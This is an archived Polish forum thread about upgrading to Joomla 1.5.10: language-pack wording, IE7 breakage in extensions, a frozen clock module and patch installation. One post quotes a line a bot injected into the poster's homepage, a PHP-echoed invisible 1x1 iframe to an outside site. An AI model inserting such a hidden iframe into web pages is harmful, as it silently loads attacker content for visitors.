PDA

Zobacz pełną wersję : Joomla 1.5.10 - pilna aktualizacja



zwiastun
28-03-2009, 12:24
Ukazało się wypuszczenie Joomla 1.5.10 - w wydaniu m.in naprawiono krytyczne luki bezpieczeństwa średniego i niskiego poziomu. Zalecana jest natychmiastowa aktualizacja. Pełny komunikat Centrum Projektu Joomla! oraz łatkę pakietu językowego i pełny pakiet językowy opublikujemy na www.joomla.pl w ciągu 1-2 godzin

zwiastun
28-03-2009, 14:04
Zgodnie z zapowiedzią, opublikowaliśmy pakiet języka polskiego oraz łatkę języka polskiego.
Wypuszczono Joomla 1.5.10 (http://www.joomla.pl/content/view/425/1/)
Zachęcamy do pobrania i pilnej aktualizacji swojego wydania Joomla!

Uwagi do pakietu języka polskiego prosimy umieszczać w tym wątku

TLo
28-03-2009, 16:40
Wszystko przebiegło bezproblemowo, witryna zdaje się chodzić, jak wcześniej :-)
Jedyna moja uwaga dotyczy nazw dni tygodnia - pisanych wciąż z dużej litery, co jest zgodne z pisownią polską, ale przedwojenną (przed 1939 r.).
Podobnie ma się sprawa z nazwami miesięcy, znów pisanymi niepotrzebnie z dużej litery, ponadto bez odmiany deklinacyjnej - mamy więc np.:
"Zmieniony: Czwartek, 26 Marzec 2009 10:10 "
kiedy winno być:
"Zmieniony: czwartek, 26 marca 2009 10:10"

Ale to pryszcz... Przedytowałem to w poprzedniej wersji, zmienię i w tej.
Inna sprawa, że takich, których ta niedogodność językowa będzie uwierać jest niewielu. Ale ja jestem starej daty...
Pozdrawiam!
TLo

Chrumek
30-03-2009, 23:02
Upgrade z 1.5.9 --> 1.5.10. przeszedł bezproblemowo. Zrobiłem go wieczorem, a dnia następnego zauważyłem, że godzina stoi w miejscu. Refresh- godzina ok, ale znowu stoi w miejscu. Zrobiłem upgrade na komputerze lokalnym - to samo. Nic w międzyczasie nie instalowałem. Do wyświetlania daty i godziny używam modułu. Zmieniłem go na inny - to samo. Czyli to nie wina modułów date/time. System chodzi w trybie Legacy (Kunena), ale po wyłączeniu - to samo. Ktoś moze ma pomysł co może być przyczyną takiej sytuacji ?

TLo
31-03-2009, 06:51
Zapewne ma to związek z bezpieczeństwem i jest świadomym działaniem - zauważyłem otóż, że GoogleMaps, wstawiane do artykułu bezpośrednio, za pośrednictwem kodu zaczynającego się od <iframe> przestały działać.
Poradziłem sobie instalując plugin_googlemap_J15.2.12f i wykorzystując pliki KLM. Co jest nawet lepszym rozwiązaniem.
Z zegara nie korzystam, ale na próbę zainstalowałem jakiś (mod_ulti_clocks), wstawiłem na stronę i widzę, że drepta sobie... Zob. http://www.smzk.org
Dlaczego Tobie nie chodzi - nie wiem...
Pozdrawiam
TLo

TLo
31-03-2009, 10:44
Uwagi do pakietu języka polskiego prosimy umieszczać w tym wątku


Mam drobną uwagę - w oknie logowania mamy u dołu trzy linki:

Nie pamiętasz hasła?
Nie pamiętasz nazwy?
Zarejestruj

Proponowałbym ten ostatni Zarejestruj zamienić na Zarejestruj się,
bowiem czasownik zwrotny ma w języku polskim zupełnie inną konotację.
Rejestrować można temperaturę, ruch czy wzrost przestępczości, natomiast rejestrujemy _się_ np. u lekarza, bądź właśnie w witrynie.
Oczywiście, każdy może to zrobić indywidualnie, poprzez edycję linii 79:
REGISTER=Zarejestruj w pliku pl-PL.com_user.ini
Ale po następnym update Joomla, znów trzeba to będzie ponowić edycję. Proponuję więc nadać tej zmianie jakąś większą trwałość :)
Pozdrawiam
TLo

bbruda
31-03-2009, 12:00
sama aktualizacja przebiegła poprawnie ale na moim testowym serwisie rozsypały się w IE7 te komponenty:

- galerię phocagallery 2.2.3 + plugin do wstawiania galerii w artykułach 2.1.0 wywala cały serwis w IE7, pomaga zmiana w kodzie plik behavior.php zgodnie z instrukcją (http://www.phoca.cz/documents/2-phoca-gallery-component/24-faq#5._Internet_Explorer_cannot_open_the_Internet_ site_-_Operation_aborted)

- virtuemart 1.1.3 próba klikniecia w produkt powoduje ten sam bład wywala okno przeglądarki IE7 - jeszcze nie znalazłam rozwiązania...
zamiana domready na load nie podziałała...

radze uważać z serwisami produkcyjnymi
pozdrawiam

bbruda
31-03-2009, 14:57
ręczne dodanie takiej lini w szablonie:
<script type="text/javascript" src="/media/system/js/mootools-frontend.js">

wyeliminowało problem IE7 i virtuemart 1.1.3, mam wprawdzie zastrzeżenia co do wyświetlania obrazków w pełnym oknie przez phocagallery ale ogólnie działa

mootools-frontend.js to po prostu najnowsza biblioteka mootools zmieniona nazwa i dodana tam gdzie starsza wersja do media

raz działa raz nie działa, ogólnie raczej dubluje biblioteki i wywala cały szablon :/

stasio
31-03-2009, 15:28
ale jajca... phoca sie sypie ie ma obrazu a linijka o której piszesz daje efekt rozpisania strony w jednej linii czy rozsypuje mi szablon...

bbruda
31-03-2009, 15:54
zgadza sie pośpieszyłam sie z napisaniem tego..
na forum virtuemarta jest paczka do pobrania z pierwszego posta tutaj (http://forum.virtuemart.net/index.php?topic=51089.0) na razie działa ale testuje czy cos jeszcze sie nie wywali...

Chrumek
31-03-2009, 18:59
TLO - dzięki za odpowiedź. Zainstalowałem wskazany moduł i... taki zegar jak Twój( analogowy) działa, ale spróbuj proszę ustawić zegar cyfrowy, z datą i wyświetlaniem czasu. : nie działa. Stoi. Jakbyś mógł to sprawdzić... A co na to "starzy wyjadacze " joomla... Co to może być ?

TLo
31-03-2009, 19:13
Nie wiem o który zegar Ci chodzi? Wstawiłem teraz na stronę jakiś zegar cyfrowy z datą - i jak widzisz - u mnie pracuje. Ale nie wiem, czy o ten Ci właśnie chodziło...
http://www.smzk.org
Pozdrawiam
TLo

big_krzysiek
31-03-2009, 22:59
u mnie po aktualizacji na dwoch stronach jak narazie wszystko ok!

@TLo: co to jest za modul do imienin?

Chrumek
31-03-2009, 23:29
Jeszcze raz dzięki. Faktycznie - ten moduł żyje (ulti clock). Przestał mi działac jedynie Date-time module for J1.5 i Ninja Date. TLo - za sprawdzanie mojego problemu na swojej stronie należy Ci się dobry browar. To jest pomoc ! Będę łapał Cię na priv.

TLo
01-04-2009, 06:48
@TLo: co to jest za modul do imienin?

To mod_Renat_universal_nameday. Znajdziesz w Google. Ma nawet polski plik językowy, co prawda z błędami ortograficznymi i bez polskich znaków, ale zawsze... Uładziłem go, spolszczyłem i używam. Jeśli ktoś potrzebuje - dołączam poniżej. Kodowanie - UTF-8

Pozdrawiam
TLo

Tgr
01-04-2009, 12:50
Mi po tej pilnij aktualizacji wczoraj bot podmienil strone glowna i dodal na koncu indeksu taka oto linijke ;-)

<?php echo '<iframe src="http://laurawww.com (http://laurawww.com/)" width=1 height=1></iframe>'; ?>

Niedlugo pewnie bedzie kolejna pilna aktualizacja :)

xandrew24x
02-04-2009, 09:16
Witam

Mam zainstalowaną wersje 1.5.10 ale nie mogę nigdzie znaleźć żadnej galerii obsługującej znaki pl, czy wiecie czy istnieje taka ?

stasio
02-04-2009, 09:39
xandrew24x - pewnie cie wyautują..... ja natomiast mam pytanie czy u kogoś zaczęły się rejestrować booty na 1.5.10? mam chaptcha na rejestracji ale mimo to sa... na 1.0.15 nie było robotów nawet bez zabezpieczenia...

Grzeska
30-04-2009, 17:39
Witam
Mam problem z aktualizacją, pojawia mi się poniższy komunikat jak próbuje wczytać łatkę
"Błąd. Nie znalazłem pliku instalacyjnego (XML) we wskazanym pakiecie. Być może pakiet jest podwójnie skompresowany."
Pozdrawiam

zwiastun
30-04-2009, 17:45
Co aktualizowałeś? Jak aktualizowałeś?

stasio
30-04-2009, 18:07
i czemu nie zrozumiałeś prostego sformułowania "Błąd. Nie znalazłem pliku instalacyjnego (XML) we wskazanym pakiecie. Być może pakiet jest podwójnie skompresowany."

Grzeska
02-05-2009, 01:47
Mam zainstalowaną wersje 1.5.9 i chciałem zaktualizować do wersji 1.5.10 jak zalecacie. Ściągnąłem wiec łatkę. W panelu administracyjnym wybrałem rozszerzenia->instalator->wczytaj paczkę no i pojawia mi się komunikat jak wyżej opisałem. Podstawy znam, szukałem w pomocy i nie znalazłem więc nie wiem gdzie robię błąd.Proszę o podpowiedź
Pozdrawiam

zwiastun
02-05-2009, 03:47
Tylko że tak się łatek nie instaluje!
http://wiki.joomla.pl/Kategoria:Instalacja_i_aktualizacja

alex51
02-05-2009, 08:02
Mam zainstalowaną wersje 1.5.9 i chciałem zaktualizować do wersji 1.5.10 jak zalecacie. Ściągnąłem wiec łatkę. W panelu administracyjnym wybrałem rozszerzenia->instalator->wczytaj paczkę no i pojawia mi się komunikat jak wyżej opisałem. Podstawy znam, szukałem w pomocy i nie znalazłem więc nie wiem gdzie robię błąd.Proszę o podpowiedź
Pozdrawiam
Aktualizacja polega na nadpisaniu plików wskazanych we wspomnianej łatce.